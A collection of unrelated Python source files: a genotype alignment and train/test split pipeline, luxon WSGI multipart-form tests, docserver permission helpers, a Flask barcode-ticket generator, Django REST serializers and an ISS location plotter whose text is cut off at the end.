parser.add_argument('--max_samples', type=int, required=False, help='Maximum number of samples per genotype',default=100)
parser.add_argument('--min_length', type=int, required=False, help='Minimum sequence length',default=-1)
parser.add_argument('--min_freq', type=int, required=False, help='Minimum occurances of a mutation',default=1)
parser.add_argument('--max_ambig_perc', type=float, required=False,
help='Maximum percentage of ambiguous characters',default=1.0)
parser.add_argument('--min_genotype_count', type=int, required=False,
help='Minimum occuances of mutation to be included', default=1)
parser.add_argument('--seed', type=int, required=False,
help='Seed for random generator', default=42)
parser.add_argument('--folder_size', type=int, required=False, help='Maximum number of samples per folder',
default=5000)
parser.add_argument('--n_threads', type=int, required=False,
help='Num threads to use', default=1)
parser.add_argument('--train_proportion', type=float, required=False,
help='Num threads to use', default=0.8)
parser.add_argument('--select_best_seqs', required=False,
help='Flag to toggle selecting highest quality seqs for scheme development',action='store_true')
parser.add_argument('-V', '--version', action='version', version='%(prog)s {}'.format(__version__))
return parser.parse_args()
def read_metadata(file):
return pd.read_csv(file, header=0, sep="\t")
def read_sample_mapping(df, sample_col, genotype_col):
metadata = {}
for index, row in df.iterrows():
sample_id = str(row[sample_col])
genotype = str(row[genotype_col])
metadata[sample_id] = genotype
return metadata
def summarize_genotypes(sample_info):
genotype_counts = sample_info['genotype'].value_counts().reset_index(name="count")
genotype_counts.columns = ['genotype', 'count']
return genotype_counts
def create_fasta_folder_structure(outdir, genotypes):
if not os.path.isdir(outdir):
os.mkdir(outdir, 0o755)
for genotype in genotypes:
path = os.path.join(outdir, str(genotype))
if not os.path.isdir(path):
os.mkdir(path, 0o755)
def calc_md5(seq):
seq = str(seq).encode()
md5 = hashlib.md5()
md5.update(seq)
return md5.hexdigest()
def folder_tracker(genotype_counts_df):
tracker = {}
for row in genotype_counts_df.itertuples():
genotype = row.genotype
count = row.count
tracker[genotype] = {'total': count, 'index': 0, 'tracker': 0}
return tracker
def generate_consensus(df):
maxValueIndexObj = df.idxmax(axis=1)
return maxValueIndexObj.tolist()
def create_pseuoseqs(consensus,df,min_count):
seqs = {
'consensus':consensus,
'A':copy.deepcopy(consensus),
'T': copy.deepcopy(consensus),
'C': copy.deepcopy(consensus),
'G': copy.deepcopy(consensus)
}
for row in df.itertuples():
pos=row.pos
if consensus[pos] == '-' or consensus[pos] == 'N':
continue
if row.A >= min_count:
seqs['A'][pos] = 'A'
if row.T >= min_count:
seqs['T'][pos] = 'T'
if row.C >= min_count:
seqs['C'][pos] = 'C'
if row.G >= min_count:
seqs['G'][pos] = 'G'
return seqs
def parse_mafft(out):
lines = out.split('\n')
seqs = {}
id = ''
seq = []
for line in lines:
line = line.strip()
if line == '':
continue
if line[0] == '>':
if id == '':
id = line.replace('>', '')
else:
seqs[id] = ''.join(seq)
seq = []
id = line.replace('>','')
else:
seq.append(line)
seqs[id] = ''.join(seq)
return seqs
def run_mafft(in_seq,threads):
p = Popen(['mafft',
'--auto', '--quiet', '--thread',"{}".format(threads),
in_seq],
stdin=PIPE,
stdout=PIPE,
stderr=PIPE)
stdout, stderr = p.communicate()
if isinstance(stdout, bytes):
stdout = stdout.decode()
return (stdout, stderr)
def map_positions(seq_1,seq_2):
look_up = {}
seq_2_len = len(seq_2)
seq_2_pos = 0
for i in range(0,len(seq_1)):
base_1 = seq_1[i]
if base_1 == '-':
look_up[i] = {'ref_aln_pos':i,'mapped_aln_pos':-1}
continue
for k in range(seq_2_pos,seq_2_len):
base_2 = seq_2[k]
seq_2_pos += 1
if base_1 == base_2:
look_up[i] = {'ref_aln_pos': i, 'mapped_aln_pos': k}
break
return look_up
def get_valid_positions(global_consensus,threshold=1):
valid_positions = []
for i in range(0, len(global_consensus)):
data = global_consensus[i]
count_bases = data['A'] + data['T'] + data['C'] + data['G']
if count_bases >= threshold:
valid_positions.append(i)
return valid_positions
def create_alignment(ref_lookup,ref_id,ref_seq,seqs,valid_positions,n_threads=1):
aln = {ref_id:ref_seq.upper()}
ref_len = len(ref_seq)
for seq_id in seqs:
seq = seqs[seq_id]
aln_seq = ['-'] * ref_len
for i in range(0,len(seq)):
base = seq[i]
if i not in valid_positions:
continue
mapped_aln_pos = ref_lookup[i]['mapped_aln_pos']
if mapped_aln_pos == -1:
continue
aln_seq[mapped_aln_pos] = base
aln[seq_id] = ''.join(aln_seq)
return aln
def mafft_add_seq(input_ref_seq,input_msa,output,n_threads):
fh = open(output,'w')
p = Popen(['mafft', '--add',input_ref_seq,
'--auto', '--quiet', '--thread',"{}".format(n_threads),
input_msa],
stdin=PIPE,
stdout=fh,
stderr=PIPE)
stdout, stderr = p.communicate()
fh.close()
return (stderr)
def create_training_sets(seq_info_df,proportion,max_size,seed):
training_sets = {}
genotypes = seq_info_df['genotype'].unique().tolist()
seq_info_df = seq_info_df.drop_duplicates(subset="md5")
for genotype in genotypes:
subset = seq_info_df[seq_info_df['genotype'] == genotype].sample(frac=proportion, replace=False, random_state=seed)
sample_ids = subset['sample_id'].tolist()
if len(sample_ids) > max_size:
sample_ids = sample_ids[:max_size-1]
training_sets[genotype] = sample_ids
return training_sets
def run():
cmd_args = parse_args()
fasta_file = cmd_args.input_msa
meta_file = cmd_args.input_meta
outdir = cmd_args.outdir
min_genotype_count = cmd_args.min_genotype_count
max_samples = cmd_args.max_samples
min_length = cmd_args.min_length
max_ambig_perc = cmd_args.max_ambig_perc
seed = cmd_args.seed
train_proportion = cmd_args.train_proportion
ref_gbk = cmd_args.ref_gbk
folder_size = cmd_args.folder_size
min_freq = cmd_args.min_freq
n_threads = cmd_args.n_threads
if not os.path.isdir(outdir):
os.mkdir(outdir, 0o755)
fasta_outdir = os.path.join(outdir, 'fastas')
scheme_datadir = os.path.join(outdir, 'scheme_data')
if not os.path.isdir(scheme_datadir):
os.mkdir(scheme_datadir, 0o755)
benchmark_datadir = os.path.join(outdir, 'benchmark_data')
if not os.path.isdir(benchmark_datadir):
os.mkdir(benchmark_datadir, 0o755)
meta_df = read_metadata(meta_file)
genotype_count_df = summarize_genotypes(meta_df)
genotype_count_df['genotype'] = genotype_count_df['genotype'].astype(str)
genotype_count_df.to_csv(os.path.join(outdir, "genotype_counts.txt"), index=False, sep="\t")
genotype_count_df = genotype_count_df[genotype_count_df['count'] >= min_genotype_count]
valid_genotypes = genotype_count_df['genotype'].tolist()
sample_mapping = read_sample_mapping(meta_df, 'sample_id', 'genotype')
create_fasta_folder_structure(fasta_outdir, valid_genotypes)
tracker = folder_tracker(genotype_count_df)
for genotype in tracker:
if not os.path.isdir(os.path.join(fasta_outdir, "{}/{}".format(genotype, tracker[genotype]['index']))):
os.mkdir(os.path.join(fasta_outdir, "{}/{}".format(genotype, tracker[genotype]['index'])), 0o755)
align_len = 0
genotype_consensus = {}
erroneous_seqs_fh = open(os.path.join(outdir, 'error_seqs.txt'), 'w')
seq_report_fh = open(os.path.join(outdir, 'seq_info.txt'), 'w')
seq_report_fh.write("sample_id\tgenotype\tmd5\tnum_seq_bases\tambig_count\tgap_count\tstatus\n")
global_consensus = []
unalign_file = os.path.join(outdir, 'unaligned.fasta')
unalign_fh = open(unalign_file, 'w')
for seq_record in SeqIO.parse(fasta_file, format='fasta'):
seq = str(seq_record.seq).upper()
length = len(seq)
seq = re.sub(r'[^A|T|C|G|-]', 'N', seq)
gap_count = seq.count('-')
ambig_count = seq.count('N')
num_seq_bases = length - (gap_count + ambig_count)
md5 = calc_md5(seq)
if align_len == 0:
align_len = length
if len(global_consensus) == 0:
for i in range(0, length):
global_consensus.append({'A': 0, 'T': 0, 'C': 0, 'G': 0, 'N': 0, '-': 0})
id = str(seq_record.id)
if align_len != length:
erroneous_seqs_fh.write("{}\t{}\t{}\n".format(seq_record, length, "mismatched length"))
continue
elif len(id) < 1:
erroneous_seqs_fh.write("{}\t{}\t{}\n".format(seq_record, length, "ID field malformed"))
continue
elif not id in sample_mapping:
erroneous_seqs_fh.write("{}\t{}\t{}\n".format(seq_record, length, "Sample ID not in genotype associations"))
continue
sample_id = id
genotype = sample_mapping[sample_id]
ambig_perc = ambig_count / num_seq_bases
status = 'Pass'
if ambig_perc > max_ambig_perc or num_seq_bases < min_length or genotype not in valid_genotypes:
status = 'Fail'
if genotype not in genotype_consensus and status == 'Pass':
genotype_consensus[genotype] = []
for i in range(0, length):
genotype_consensus[genotype].append({'A': 0, 'T': 0, 'C': 0, 'G': 0, 'N': 0, '-': 0})
if status == 'Pass':
for i in range(0, length):
base = seq[i]
genotype_consensus[genotype][i][base] += 1
global_consensus[i][base] += 1
tracker[genotype]['tracker']+=1
if tracker[genotype]['tracker'] >= folder_size:
tracker[genotype]['tracker'] = 0
tracker[genotype]['index']+=1
if not os.path.isdir(os.path.join(fasta_outdir, "{}/{}".format(genotype, tracker[genotype]['index']))):
os.mkdir(os.path.join(fasta_outdir, "{}/{}".format(genotype, tracker[genotype]['index'])), 0o755)
fasta_out = os.path.join(fasta_outdir, genotype)
fasta_out = os.path.join(fasta_out, str(tracker[genotype]['index']))
seq_fh = open(os.path.join(fasta_out, "{}.fasta".format(sample_id)), 'w')
seq_fh.write(">{}\n{}".format(sample_id, re.sub(r'-', '', seq)))
seq_fh.close()
unalign_fh.write(">{}\n{}".format(sample_id, re.sub(r'-', '', seq)))
seq_report_fh.write(
"{}\t{}\t{}\t{}\t{}\t{}\t{}\n".format(sample_id, genotype, md5, num_seq_bases, ambig_count, gap_count,status))
erroneous_seqs_fh.close()
seq_report_fh.close()
seq_info_df = read_metadata(os.path.join(outdir, 'seq_info.txt'))
seq_info_df = seq_info_df[seq_info_df['status'] == 'Pass']
consensus_outdir = os.path.join(outdir, 'consensus')
if not os.path.isdir(consensus_outdir):
os.mkdir(consensus_outdir, 0o755)
consensus_df = pd.DataFrame(global_consensus)
consensus_df.to_csv(
os.path.join(consensus_outdir, "{}_consensus_report.txt".format('global')))
global_consensus_seq = generate_consensus(consensus_df)
consensus_df['pos'] = consensus_df.index
pseudo_seqs = create_pseuoseqs(global_consensus_seq, consensus_df, min_freq)
cons_seqs = {}
for genotype in genotype_consensus:
pd.DataFrame(genotype_consensus[genotype]).to_csv(
os.path.join(consensus_outdir, "{}_consensus_report.txt".format(genotype)))
cons_seq = []
for pos in genotype_consensus[genotype]:
cons_seq.append(max(pos.items(), key=operator.itemgetter(1))[0])
cons_seqs[genotype] = cons_seq
with open(ref_gbk) as handle:
for record in GenBank.parse(handle):
gb_accession = record.accession[0]
gb_accession_version = record.version.split('.')[1]
genome_seq = repr(record.sequence).replace("\'",'')
unaligned = ">{}\n{}\n>{}\n{}\n".format(gb_accession,genome_seq,"consensus",''.join(pseudo_seqs["consensus"]))
unaligned_file = os.path.join(outdir,"unaligned.fas")
fh = open(unaligned_file,'w')
fh.write(unaligned)
fh.close()
(stdout,stderr) = run_mafft(unaligned_file,n_threads)
os.remove(unaligned_file)
aligned_seq = parse_mafft(stdout)
ref_lookup = map_positions(global_consensus_seq, list(aligned_seq['consensus'].upper()))
valid_positions = get_valid_positions(global_consensus,min_freq)
training_sets = create_training_sets(seq_info_df, train_proportion, max_samples, seed)
training_samples = []
for genotype in training_sets:
training_samples.extend(training_sets[genotype])
test_sets = create_training_sets(seq_info_df[~seq_info_df['sample_id'].isin(training_samples)], 1-train_proportion, max_samples, seed)
test_samples = []
for genotype in test_sets:
test_samples.extend(test_sets[genotype])
train_seqs = {}
for seq_record in SeqIO.parse(fasta_file, format='fasta'):
seq = str(seq_record.seq).upper()
seq = re.sub(r'[^A|T|C|G|-]', 'N', seq)
id = str(seq_record.id)
if id in training_samples:
path_prefix = scheme_datadir
elif id in test_samples:
path_prefix = benchmark_datadir
else:
continue
fasta_fh = open(os.path.join(path_prefix,"{}.fasta".format(id)), 'w')
fasta_fh.write(">{}\n{}\n".format(id,seq.replace('-','')))
fasta_fh.close()
train_seqs[id] = seq
pseudo_seqs.update(cons_seqs)
pseudo_seqs.update(train_seqs)
ref_seq_path = os.path.join(outdir, "ref.unaligned.fasta")
input_msa_path = os.path.join(outdir, "pseudo.unaligned.fasta")
fasta_fh = open(input_msa_path, 'w')
for id in pseudo_seqs:
if isinstance(pseudo_seqs[id],list):
pseudo_seqs[id] = ''.join(pseudo_seqs[id])
fasta_fh.write(">{}\n{}\n".format(id, pseudo_seqs[id]))
fasta_fh.close()
fasta_fh = open(ref_seq_path, 'w')
fasta_fh.write(">{}\n{}\n".format(gb_accession, ''.join(genome_seq)))
output_msa = os.path.join(consensus_outdir, "allgenotype_consensus.fasta")
mafft_add_seq(ref_seq_path, input_msa_path, output_msa, n_threads)
# call main function
if __name__ == '__main__':
run()
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 Christiaan Frans Rademan <chris@fwiw.co.za>.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
import pytest
from luxon import register
@pytest.fixture(scope="module")
def client():
from luxon.testing.wsgi.client import Client
return Client(__file__)
payload = """-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="text"
test
-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="multiple_text"
test
-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="multiple_text"
test
-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="file"; filename="file"
Content-Type: application/octet-stream
test
-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="multiple_file"; filename="file"
Content-Type: application/octet-stream
test
-----------------------------88571074919314010861842727997
Content-Disposition: form-data; name="multiple_file"; filename="file"
Content-Type: application/octet-stream
test
-----------------------------88571074919314010861842727997--"""
headers = {}
headers['Content-Type'] = "multipart/form-data;" + \
"boundary=---------------------------" + \
"88571074919314010861842727997"
headers['Content-Length'] = "950"
def test_wsgi_form_json(client):
@register.resource('POST', '/form_json')
def form_json(req, resp):
return req.form_json
result = client.post(path='/form_json', headers=headers, body=payload)
assert result.status_code == 200
response = result.json
assert response['text'] == 'test'
assert isinstance(response['multiple_text'], list)
for i in range(2):
assert response['multiple_text'][i] == 'test'
assert response['file']['name'] == 'file'
assert response['file']['type'] == 'application/octet-stream'
assert response['file']['base64'] == 'dGVzdAo=\n'
assert isinstance(response['multiple_file'], list)
for i in range(2):
assert response['multiple_file'][i]['name'] == 'file'
assert response['multiple_file'][i]['type'] == 'application/octet-stream'
assert response['multiple_file'][i]['base64'] == 'dGVzdAo=\n'
def test_wsgi_form_get_first(client):
@register.resource('POST', '/form_get_first')
def form_get_first(req, resp):
return req.get_first('text')
result = client.post(path='/form_get_first', headers=headers, body=payload)
assert result.status_code == 200
assert result.text == 'test'
def test_wsgi_form_get_list(client):
@register.resource('POST', '/form_get_list')
def form_get_list(req, resp):
return req.get_list('multiple_text')
result = client.post(path='/form_get_list', headers=headers, body=payload)
assert result.status_code == 200
response = result.json
assert isinstance(response, list)
for i in range(2):
assert response[i] == 'test'
def test_wsgi_form_get_file(client):
@register.resource('POST', '/form_get_file')
def form_get_file(req, resp):
file = req.get_file('file')
response = {}
response['name'] = file.filename
response['type'] = file.type
response['data'] = file.file.read()
return response
result = client.post(path='/form_get_file', headers=headers, body=payload)
assert result.status_code == 200
response = result.json
assert response['name'] == 'file'
assert response['type'] == 'application/octet-stream'
assert response['data'] == 'test\n'
def test_wsgi_form_get_files(client):
@register.resource('POST', '/form_get_files')
def form_get_files(req, resp):
file = req.get_files('multiple_file')
response = []
for f in file:
o = {}
o['name'] = f.filename
o['type'] = f.type
o['data'] = f.file.read()
response.append(o)
return response
result = client.post(path='/form_get_files', headers=headers, body=payload)
assert result.status_code == 200
response = result.json
for i in range(2):
assert response[i]['name'] == 'file'
assert response[i]['type'] == 'application/octet-stream'
assert response[i]['data'] == 'test\n'
def test_wsgi_form_get_all_files(client):
@register.resource('POST', '/form_get_all_files')
def form_get_all_files(req, resp):
file = req.get_all_files()
response = []
for f in file:
o = {}
o['name'] = f.filename
o['type'] = f.type
o['data'] = f.file.read()
response.append(o)
return response
result = client.post(path='/form_get_all_files', headers=headers, body=payload)
assert result.status_code == 200
response = result.json
for i in range(3):
assert response[i]['name'] == 'file'
assert response[i]['type'] == 'application/octet-stream'
assert response[i]['data'] == 'test\n'
|
import logging
from docserver.config import config
from docserver.db import models as db_models
logger = logging.getLogger(__name__)
def add_permission(username: str, permission: str, provided_permissions=None):
db = config.db.local_session()
global_admin_permission = db_models.Permission.read_unique(db, dict(scope=config.permissions.default_admin_permission,
operation='admin'))
if not global_admin_permission.check(provided_permissions):
raise PermissionError
user = db_models.User.get_or_create(dict(username=username), db=db)
user.add_permission(permission, db=db)
def remove_permission(username: str, permission: str, provided_permissions=None):
db = config.db.local_session()
global_admin_permission = db_models.Permission.read_unique(db, dict(scope=config.permissions.default_admin_permission,
operation='admin'))
if not global_admin_permission.check(provided_permissions):
raise PermissionError
user = db_models.User.get_or_create(dict(username=username), db=db)
user.remove_permission(permission, db=db)
def list_permission(username: str, provided_permissions=None):
db = config.db.local_session()
global_admin_permission = db_models.Permission.read_unique(db, dict(scope=config.permissions.default_admin_permission,
operation='admin'))
if not global_admin_permission.check(provided_permissions):
raise PermissionError
user = db_models.User.get_or_create(dict(username=username), db=db)
return user.permissions
|
from flask import Flask, render_template
from flask import request, escape, send_file, send_from_directory, current_app
from PIL import Image
import random
import pandas as pd
from datetime import date
import os
from barcode import EAN13
from barcode.writer import ImageWriter
import numpy as np
import PyPDF2
import shutil
from utils import delete_blob, check_if_duplicates, add_margin, get_concat_h, get_concat_v, get_image, save_image, save_pdf, get_pdf
import glob
from google.cloud import storage
from google.api_core import exceptions
import io
app = Flask(__name__)
app.config['bucket'] = "eru-relief-barcode-generator.appspot.com"
app.config['codes_blob'] = "barcodes/codes.csv"
app.config['images_tmp'] = "images/tmp"
app.config['images_final'] = "images"
storage_client = storage.Client.from_service_account_json('creds.json')
barcodes_public_url = ""
@app.route("/")
def index():
# delete old barcodes
try:
delete_blob(storage_client, app.config['bucket'], app.config['codes_blob'])
bucket = storage_client.get_bucket(app.config['bucket'])
bucket.delete_blobs(blobs=list(bucket.list_blobs(prefix=app.config['images_tmp'])))
bucket.delete_blobs(blobs=list(bucket.list_blobs(prefix=app.config['images_final'])))
except exceptions.NotFound:
pass
return render_template('form.html')
@app.route("/generate_barcodes", methods=['GET', 'POST'])
def generate_barcodes():
if request.method == 'GET':
return f"The URL /data is accessed directly. Try going to '/form' to submit form"
if request.method == 'POST':
form_data = request.form
bucket = storage_client.get_bucket(app.config['bucket'])
# try:
no_tickets = int(form_data['no_tickets'])
codes = random.sample(range(100000000000, 200000000000), no_tickets)
while check_if_duplicates(codes):
codes = random.sample(range(100000000000, 200000000000), no_tickets)
codes.sort()
df = pd.DataFrame({'barcode': codes})
df = df.sort_values(by=['barcode'])
# save codes to csv
blob = bucket.blob(app.config['codes_blob'])
blob.upload_from_string(df.to_csv(), 'text/csv')
list_im_path = []
for code in codes:
image_path = app.config['images_tmp'] + f"/{code}.png"
list_im_path.append(image_path)
blob = bucket.blob(image_path)
rv = io.BytesIO()
EAN13(str(code), writer=ImageWriter()).write(rv)
blob.upload_from_string(rv.getvalue(), content_type="image/png")
for image_path in list_im_path:
im = get_image(bucket, image_path)
im_new = add_margin(im, 100, 50, 100, 50, (255, 255, 255))
save_image(im_new, bucket, image_path)
im_index = 0
cnt_page = 0
logo_file = "logos/merged.png"
mergeFile = PyPDF2.PdfFileMerger()
while im_index < len(list_im_path):
print(f"generating page {cnt_page} starting at image {im_index}")
imreflogo = get_image(bucket, logo_file)
imlogo = get_image(bucket, logo_file)
if im_index == 0:
imref = get_image(bucket, list_im_path[im_index])
im_index += 1
else:
im_index -= 1
imref = get_image(bucket, list_im_path[im_index])
im_index += 1
for cnt_row in range(5):
for cnt_col in range(2):
if im_index < len(list_im_path):
img = get_image(bucket, list_im_path[im_index])
save_image(get_concat_h(imref, img),
bucket,
f"{app.config['images_tmp']}/row_{cnt_row}.png")
imref = get_image(bucket, f"{app.config['images_tmp']}/row_{cnt_row}.png")
save_image(get_concat_h(imreflogo, imlogo),
bucket,
f"{app.config['images_tmp']}/rlogo_{cnt_row}.png")
imreflogo = get_image(bucket, f"{app.config['images_tmp']}/rlogo_{cnt_row}.png")
im_index += 1
if im_index < len(list_im_path):
imref = get_image(bucket, list_im_path[im_index])
im_index += 1
imreflogo = get_image(bucket, logo_file)
# merge all rows with barcodes
list_row_path = []
for blob in bucket.list_blobs(prefix=app.config['images_tmp']):
if "row" in blob.name:
list_row_path.append(blob.name)
imref = get_image(bucket, list_row_path[0])
for im_path in list_row_path[1:]:
img = get_image(bucket, im_path)
save_image(get_concat_v(imref, img),
bucket,
f"{app.config['images_tmp']}/page_{cnt_page}.png")
imref = get_image(bucket, f"{app.config['images_tmp']}/page_{cnt_page}.png")
# merge all rows with logos
list_logo_path = []
for blob in bucket.list_blobs(prefix=app.config['images_tmp']):
if "rlogo" in blob.name:
list_logo_path.append(blob.name)
imreflogo = get_image(bucket, list_logo_path[0])
for im_path in list_logo_path[1:]:
imlogo = get_image(bucket, im_path)
save_image(get_concat_v(imreflogo, imlogo),
bucket,
f"{app.config['images_tmp']}/page_logo_{cnt_page}.png")
imreflogo = get_image(bucket, f"{app.config['images_tmp']}/page_logo_{cnt_page}.png")
image1 = get_image(bucket, f"{app.config['images_tmp']}/page_{cnt_page}.png")
im1 = image1.convert('RGB')
save_pdf(im1, bucket, f"{app.config['images_tmp']}/page_{cnt_page}.pdf")
image1 = get_image(bucket, f"{app.config['images_tmp']}/page_logo_{cnt_page}.png")
im1 = image1.convert('RGB')
save_pdf(im1, bucket, f"{app.config['images_tmp']}/page_logo_{cnt_page}.pdf")
mergeFile.append(get_pdf(bucket, f"{app.config['images_tmp']}/page_{cnt_page}.pdf"))
mergeFile.append(get_pdf(bucket, f"{app.config['images_tmp']}/page_logo_{cnt_page}.pdf"))
cnt_page += 1
blob = bucket.blob(f"{app.config['images_final']}/pages_merged.pdf")
fp = io.BytesIO()
mergeFile.write(fp)
blob.upload_from_string(fp.getvalue(), content_type="application/pdf")
return render_template('data.html')
@app.route('/download_codes', methods=['GET', 'POST'])
def download_codes():
bucket = storage_client.get_bucket(app.config['bucket'])
blob = bucket.blob(app.config['images_final'] + "/pages_merged.pdf")
with blob.open("rb") as f:
contents = f.read()
return send_file(io.BytesIO(contents), mimetype='application/pdf',
as_attachment=True, download_name="tickets.pdf")
if __name__ == "__main__":
app.run(host="127.0.0.1", port=7070, debug=True)
|
s = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
def to_base(n, b):
return "0" if not n else to_base(n//b, b).lstrip("0") + s[n%b]
n, m = map(int, input().split())
print(to_base(n, m))
|
from rest_framework import serializers
from goods2.models import Deviceid, DeviceidPrecision, DeviceidTrain, Image, ImageGroundTruth, ImageResult, UpcBind, TrainImage, TrainAction, TrainModel, TrainActionUpcs, ImageTrainModel, TaskLog
class DeviceidPrecisionSerializer(serializers.ModelSerializer):
class Meta:
model = DeviceidPrecision
fields = ('pk', 'truth_rate', 'precision', 'create_time')
read_only_fields = ('create_time',)
class DeviceidSerializer(serializers.ModelSerializer):
device_precisions = DeviceidPrecisionSerializer(many=True, read_only=True)
class Meta:
model = Deviceid
fields = ('pk', 'deviceid', 'state', 'device_precisions', 'create_time', 'update_time', 'commercial_time')
read_only_fields = ('create_time', 'update_time', 'commercial_time')
class DeviceidTrainSerializer(serializers.ModelSerializer):
class Meta:
model = DeviceidTrain
fields = ('pk', 'deviceid','create_time')
read_only_fields = ('create_time',)
class ImageResultSerializer(serializers.ModelSerializer):
class Meta:
model = ImageResult
fields = ('pk', 'image', 'upc', 'score')
class ImageGroundTruthSerializer(serializers.ModelSerializer):
class Meta:
model = ImageGroundTruth
fields = ('pk', 'deviceid', 'upc', 'identify', 'cnt', 'truth_rate', 'precision', 'create_time')
read_only_fields = ('cnt', 'truth_rate', 'precision', 'create_time',)
class ImageTrainModelSerializer(serializers.ModelSerializer):
class Meta:
model = ImageTrainModel
fields = ('pk', 'train_model', 'image')
class UserImageSerializer(serializers.ModelSerializer):
image_results = ImageResultSerializer(many=True, read_only=True)
image_ground_truth = ImageGroundTruthSerializer(many=False, read_only=True)
class Meta:
model = Image
fields = ('pk', 'deviceid', 'source', 'upc', 'image_ground_truth', 'image_results', 'create_time')
read_only_fields = ('create_time',)
class ImageSerializer(serializers.ModelSerializer):
image_results = ImageResultSerializer(many=True, read_only=True)
image_ground_truth = ImageGroundTruthSerializer(many=False, read_only=True)
train_models = ImageTrainModelSerializer(many=True, read_only=True)
class Meta:
model = Image
fields = ('pk', 'deviceid', 'identify', 'source', 'image_ground_truth', 'image_results', 'train_models', 'is_train', 'is_hand','create_time')
read_only_fields = ('create_time',)
class UpcBindSerializer(serializers.ModelSerializer):
class Meta:
model = UpcBind
fields = (
'pk', 'deviceid', 'upc1', 'upc2')
read_only_fields = ('create_time', 'update_time')
class TrainImageSerializer(serializers.ModelSerializer):
class Meta:
model = TrainImage
fields = ('pk', 'deviceid', 'source', 'upc', 'source_from', 'score', 'source_image', 'create_time', 'update_time', 'special_type')
read_only_fields = ('source_image', 'create_time', 'update_time')
class TrainActionUpcsSerializer(serializers.ModelSerializer):
class Meta:
model = TrainActionUpcs
fields = ('pk', 'upc', 'cnt')
class TrainModelSerializer(serializers.ModelSerializer):
class Meta:
model = TrainModel
fields = ('pk', 'model_path', 'checkpoint_step', 'precision', 'create_time')
read_only_fields = ('model_path', 'checkpoint_step', 'precision', 'create_time', )
class TrainActionSerializer(serializers.ModelSerializer):
upcs = TrainActionUpcsSerializer(many=True, read_only=True)
class Meta:
model = TrainAction
fields = ('pk', 'action', 'state', 'deviceid', 'f_model', 'desc', 'train_path', 'create_time', 'update_time', 'ip', 'train_command', 'eval_command', 'complete_time', 'train_cnt', 'validation_cnt', 'upcs')
read_only_fields = ('train_path', 'create_time', 'update_time', 'ip', 'train_command', 'eval_command', 'complete_time', 'train_cnt', 'validation_cnt', 'upcs')
class TaskLogSerializer(serializers.ModelSerializer):
class Meta:
model = TaskLog
fields = ('pk', 'name', 'ip', 'message', 'state', 'create_time', 'update_time')
|
# for matplotlib stuffs
import matplotlib.pyplot as plt
from matplotlib.offsetbox import OffsetImage, AnnotationBbox, TextArea
# for iss api
import urllib.request
import json
import time
# for os
import sys, os
# setting map image
# map_image = 'assets\\1024px-Land_shallow_topo_2048.jpg'
map_image = os.path.join('assets', '1024px-Land_shallow_topo_2048.jpg')
map_ = plt.imread(map_image)
# setting iss icon image
# iss_image = 'assets\\iss.png'
iss_image = os.path.join('assets', 'iss.png')
iss_ = plt.imread(iss_image)
# initialising past locations history
past_loc = []
# minimum and maximum longitude and latitude
min_longi = -180
max_longi = 180
min_lati = -90
max_lati = 90
# setting extent box
BBox = ((min_longi, max_longi,
min_lati, max_lati))
# scale factor
sf = 5
# setting width and height of the map image
width = abs(max_longi - min_longi) / sf
height = abs(max_lati - min_lati) / sf
# zoom factor of the iss icon
z = 0.1
# TODO: dynamic z on sf
def get_iss_loc():
# iss api information
url = 'http://api.open-notify.org/iss-now.json'
# sending api request and returning result
response = urllib.request.urlopen(url)
result = json.loads(response.read())
# gathered iss location
location = result['iss_position']
latitude = location['latitude']
longitude = location['longitude']
timestamp = result['timestamp']
# marking point with request timestamp
return ((float(longitude), float(latitude)), timestamp)
# empty plot
fig, ax = plt.subplots(figsize=(width, height))
# customizing plot
ax.set_xlim(min_longi, max_longi)
ax.set_ylim(min_lati , max_lati)
ax.set_xlabel('Longitudes')
ax.set_ylabel('Latitudes')
ax.grid(True)
# longitude and latitude ticks list
longi_li = list(range(min_longi, max_longi+1, 20))
lati_li = list(range(min_lati, max_lati+1, 30))
def append_deg(x, neg, pos):
if x < 0:
return str(abs(x)) + u"\u00b0" + neg
elif x > 0:
return str(x) + u"\u00b0" + pos
else:
return str(x) + u"\u00b0"
longi_li = list(map(lambda x: append_deg(x, 'W', 'E'), longi_li))
lati_li = list(map(lambda x: append_deg(x, 'S', 'N'), lati_li))
# setting axes ticks
plt.xticks(ticks=list(range(min_longi, max_longi+1, 20)), labels=longi_li)
plt.yticks(ticks=list(range(min_lati, max_lati+1, 30)), labels=lati_li)
# display map with 65% transperancy
ax.imshow(map_, alpha=0.65, extent = BBox)
# iss icon
im = OffsetImage(iss_, zoom=z)
fig_num = fig.number
start_time = None
while True:
try:
pt, t = get_iss_loc() # use API to get iss location and timestamp
except Exception as e:
print('An Exception was raised while requesting through API. Details are as follows:')
print(e)
input('Press any key to quit...')
